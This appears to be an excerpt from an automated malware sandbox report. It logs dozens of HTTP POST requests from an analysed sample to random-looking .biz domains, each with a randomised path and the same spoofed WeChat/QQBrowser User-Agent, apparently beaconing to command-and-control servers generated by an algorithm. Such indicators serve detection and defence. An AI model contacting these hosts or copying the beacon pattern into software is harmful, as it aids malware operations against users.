              Source: global trafficHTTP traffic detected: POST /dgcyhyi HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: fwiwk.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 786
              Source: global trafficHTTP traffic detected: POST /lnlr HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: saytjshyf.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
              Source: global trafficHTTP traffic detected: POST /atyxaeuca HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: fwiwk.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 786
              Source: global trafficHTTP traffic detected: POST /ioljnnvkrvc HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: tbjrpv.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 786
              Source: global trafficHTTP traffic detected: POST /vcjmpg HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: vcddkls.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
              Source: global trafficHTTP traffic detected: POST /luaao HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: deoci.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 786
              Source: global trafficHTTP traffic detected: POST /ewjlslyiisf HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: gytujflc.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 786
              Source: global trafficHTTP traffic detected: POST /wtdwobcctwkccpvu HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: fwiwk.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
              Source: global trafficHTTP traffic detected: POST /fnaptxelbkqpwkk HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: gytujflc.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 786
              Source: global trafficHTTP traffic detected: POST /vyoggvtcvxheoco HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: qaynky.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 786
              Source: global trafficHTTP traffic detected: POST /d HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: fwiwk.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
              Source: global trafficHTTP traffic detected: POST /qjuvsft HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: bumxkqgxu.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 786
              Source: global trafficHTTP traffic detected: POST /bvee HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: tbjrpv.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
              Source: global trafficHTTP traffic detected: POST /nvddaclxpive HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: dwrqljrr.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 786
              Source: global trafficHTTP traffic detected: POST /h HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: deoci.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
              Source: global trafficHTTP traffic detected: POST /m HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: nqwjmb.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 786
              Source: global trafficHTTP traffic detected: POST /pboamknl HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: gytujflc.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
              Source: global trafficHTTP traffic detected: POST /mfuaeqrjbxmv HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: gytujflc.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
              Source: global trafficHTTP traffic detected: POST /nxbumxilirhmvku HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: ytctnunms.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 786
              Source: global trafficHTTP traffic detected: POST /jaumpxr HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: qaynky.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
              Source: global trafficHTTP traffic detected: POST /ptbejgswjfxl HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: myups.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 786
              Source: global trafficHTTP traffic detected: POST /xgterudimsf HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: myups.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 786
              Source: global trafficHTTP traffic detected: POST /mitdmmperwbt HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: oshhkdluh.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 786
              Source: global trafficHTTP traffic detected: POST /pyts HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: bumxkqgxu.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
              Source: global trafficHTTP traffic detected: POST /ovcqqvbb HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: yunalwv.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 786
              Source: global trafficHTTP traffic detected: POST /xphvd HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: yunalwv.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 786
              Source: global trafficHTTP traffic detected: POST /hpbkng HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: dwrqljrr.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
              Source: global trafficHTTP traffic detected: POST /qmkllgvo HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: jpskm.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 786
              Source: global trafficHTTP traffic detected: POST /ouftojym HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: lrxdmhrr.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 786
              Source: global trafficHTTP traffic detected: POST /kaxtgyu HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: nqwjmb.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
              Source: global trafficHTTP traffic detected: POST /h HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: wllvnzb.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 786
              Source: global trafficHTTP traffic detected: POST /dpntwbnivmh HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: ytctnunms.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
              Source: global trafficHTTP traffic detected: POST /mshoclxftgdlbsbo HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: wllvnzb.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 786
              Source: global trafficHTTP traffic detected: POST /cxtsujgx HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: myups.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
              Source: global trafficHTTP traffic detected: POST /ryysvg HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: gnqgo.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 786
              Source: global trafficHTTP traffic detected: POST /lihflvfpneg HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: myups.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
              Source: global trafficHTTP traffic detected: POST /ihixrfcnmctn HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: oshhkdluh.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
              Source: global trafficHTTP traffic detected: POST /bsskdfvqijpyfnid HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: jhvzpcfg.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 786
              Source: global trafficHTTP traffic detected: POST /dxsssktqcq HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: acwjcqqv.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 786
              Source: global trafficHTTP traffic detected: POST /gdfpfuufvopwu HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: yunalwv.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
              Source: global trafficHTTP traffic detected: POST /v HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: yunalwv.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
              Source: global trafficHTTP traffic detected: POST /qgorjabxoa HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: jpskm.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
              Source: global trafficHTTP traffic detected: POST /v HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: vyome.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 786
              Source: global trafficHTTP traffic detected: POST /weir HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: yauexmxk.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 786
              Source: global trafficHTTP traffic detected: POST /xg HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: lrxdmhrr.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
              Source: global trafficHTTP traffic detected: POST /hrvg HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: iuzpxe.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 786
              Source: global trafficHTTP traffic detected: POST /bc HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: wllvnzb.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
              Source: global trafficHTTP traffic detected: POST /gmghpoftyccoynqy HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: ocsvqjg.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
              Source: global trafficHTTP traffic detected: POST /cnrdlkv HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: cjvgcl.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 786
              Source: global trafficHTTP traffic detected: POST /sfjvwxnay HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: neazudmrq.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 786
              Source: global trafficHTTP traffic detected: POST /ojgeebrrbqmxd HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: pgfsvwx.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 786
              Source: global trafficHTTP traffic detected: POST /gtcagitskd HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: ywffr.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
              Source: global trafficHTTP traffic detected: POST /k HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: ecxbwt.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
              Source: global trafficHTTP traffic detected: POST /ylviltyasno HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: pectx.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
              Source: global trafficHTTP traffic detected: POST /ket HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: zyiexezl.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
              Source: global trafficHTTP traffic detected: POST /tukpf HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: aatcwo.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 786
              Source: global trafficHTTP traffic detected: POST /pfxv HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: banwyw.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
              Source: global trafficHTTP traffic detected: POST /tbjlfrgpjsj HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: wxgzshna.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
              Source: global trafficHTTP traffic detected: POST /yroespvujukavm HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: wxgzshna.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
              Source: global trafficHTTP traffic detected: POST /utmatjvdttvmj HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: kcyvxytog.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 786
              Source: global trafficHTTP traffic detected: POST /lyeldophhxwh HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: zrlssa.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
              Source: global trafficHTTP traffic detected: POST /dtvapdfrlqmxxmr HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: nwdnxrd.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 786
              Source: global trafficHTTP traffic detected: POST /ekoddjskuurntxll HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: jlqltsjvh.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
              Source: global trafficHTTP traffic detected: POST /ljkvkq HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: ereplfx.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 786
              Source: global trafficHTTP traffic detected: POST /m HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: ptrim.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 786
              Source: global trafficHTTP traffic detected: POST /ipraobeqvefqwo HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: xyrgy.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
